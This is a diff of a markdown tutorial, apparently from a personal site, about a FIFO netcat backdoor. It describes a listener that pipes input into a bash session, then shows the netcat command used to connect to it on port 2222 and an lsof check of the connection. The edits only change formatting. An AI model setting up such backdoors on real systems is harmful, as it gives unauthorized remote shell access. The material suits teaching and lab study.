Tech-Bandit/tech-bandit.github.io/fifo_backdoor.md

 > In the above command we are creating a netcat listener that forwards all input through a backpipe and then into a bash session.
 It then takes the output of the bash session and puts it back into the netcat listener.

 **Machine 2**

 Connect to this backdoor
-1. Get IP address info
+1. Get IP address info `ip add`
-`ip add`
-2. Run netcat on the IP + Port
-`nc 172.20.146.40 2222`
+2. Run netcat on the IP + Port `nc 172.20.146.40 2222`

 **Machine 1**

-Open another tab on the original machine to analyse the backdoor connection `lsof -i -P`
+Open another tab on the original machine to analyse the backdoor connection using `lsof -i -P`

 |Flag       |Define       |